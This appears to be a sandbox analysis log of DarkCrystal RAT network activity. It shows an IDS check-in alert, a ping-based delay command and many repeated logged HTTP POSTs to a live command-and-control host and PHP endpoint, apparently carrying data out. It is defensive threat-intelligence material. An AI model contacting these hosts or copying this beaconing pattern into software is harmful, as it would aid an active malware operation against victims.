                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49718 -> 80.211.144.156:80
                              Uses ping.exe to check the status of other devices and networks
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                              Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 151756Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
